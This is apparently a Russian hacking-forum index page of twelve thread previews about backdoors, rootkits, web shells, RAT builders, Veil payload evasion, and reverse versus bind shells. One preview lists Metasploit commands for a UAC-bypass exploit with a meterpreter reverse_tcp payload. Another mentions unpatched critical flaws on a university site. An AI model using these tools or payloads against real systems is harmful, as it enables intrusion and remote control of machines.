shell

  1. Vertigo

    Vegile Управление backdoor и rootkits

    Добрый день,Уважаемые Друзья ,Форумчане и Гости,кому небезразличен пульс ИБ. Сегодня буду вас немного огорчать своим обзором (а там не знаю,может кого и радовать) Когда свои работы дарят миру такие авторы,то сомневаться в их компетенции не приходится. Далёкий привет из Индонезии. Встречаем...
  2. r0hack

    Статья Web-Shells или как управлять сервером после получения доступа

    Всем Салам. Сегодня решил поделится с вами довольно таки интересной темой. Когда мы получаем доступ к серваку, то делать руками гадать, что где находится довольно таки сложно и все это может затянуться. Поэтому, самым оптимальным решением является залить веб-шелл, через бекдор. Сегодня я не буду...
  3. M

    Что делать с сервером?

    Привет. Так получилось что нашел много уязвимостей на сайте одного крупного московского вуза. Пиал кому-только можно в вузе, в итоге за пол года закрыли всего несколько уязвимостей, хотя все еще осталось много критичных. К примеру в личном кабинете есть скуля, можно уронить сервер, а на основной...
  4. A

    Veil 3 Odrnance. Часть 1

    Установка Часть первая. Veil Ordnance Часть вторая. Veil Evasion Взлом удаленного компьютера. Veil-Evasion. Metasploit Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее). Однако более менее подробного осмотра продукта не нашёл. А если, чего то...
  5. E

    HTTP Methods - Ютилиты!

    Протестировал свой сайт и нашёл следующие уязвимости: + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE, PATCH + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE'...
  6. O

    Проблема A framework for Backdoor development!

    Всем привет. Я только начинаю свой путь и активно развиваюсь благодаря форму Codeby. Но на данный момент, я не могу сделать годный обзор на фраемворк, который я нашел, на это есть несколько причин. Первая - нужно подтягивать знания англ. яз, второе - не понимаю до конца всех процессов. Но очень...
  7. Ondrik8

    Soft SHELLCODE MAPPER

    ИНСТРУМЕНТ ДЛЯ ПРОФИ SMAP Доп. ресурсы: + http://shell-storm.org/shellcode/ + https://www.exploit-db.com/shellcode/
  8. Z

    Проблема Как обнаружить шелл на сервере

    Сайт на работе взломали. Система - самопис, постоянно поддерживается и модифицируется. Мест для загрузки файлов нет. Сейчас даже file_get_contents нигде не используется, только curl для сбора инфы с внешки. Fopen тоже не вижу. На что смотреть, как можно найти эту гадость. То что это шелл не...
  9. ghostphisher

    Статья Ningalinet-rat - ратник за пару минут

    Всем привет! Хочу показать еще один комбайн/фабрику/фреймворк по созданию полезной нагрузки, проще говоря ратника ( троян, зловред, шелогон и т.д.). Его фишка - простота и понятность, чем то напомниает первые билды под трояны "привет 2000-е" ;) Ниже видео (не мое), сам с ним познакомлюсь...
  10. PeaceMaker

    Решено Неудачная атака. Windows XP, 135 порт.

    Уважаемые гуру, видимо, ввиду отсутствия опыта и достаточного количества знаний я зашёл в тупик. Прошу совет - что я делаю не так? Итак: захожу в локальную сеть по WI-FI, сканирую диапазон и вижу довольно редкую в наше время машину Win XP с открытым 135 портом. Запускаю metasploit...
  11. <~DarkNode~>

    Статья REVERSE или BIND shell? В чем разница?Какой выбрать?

    Приветствую Вас колеги. Сегодня появилась необходимость написать небольшой мануал для новичков в котором я попытаюсь донести в чем же таки разница между REVERSE и BIND шеллом и какие самые распространенные способы его получить существуют. Это в первую очередь нужно мне для того что бы можно...
  12. K

    [Error 5] Access is denied

    Доброе утро, сможет кто помочь новичку? Цель (Windows 10 X64) полностью под моим контролем Cпособ: use exploit/windows/local/bypassuac_injection options set target 1 *1=64* set session 1 set LHOST ********** set payload windows/x64/meterpreter/reverse_tcp exploit run...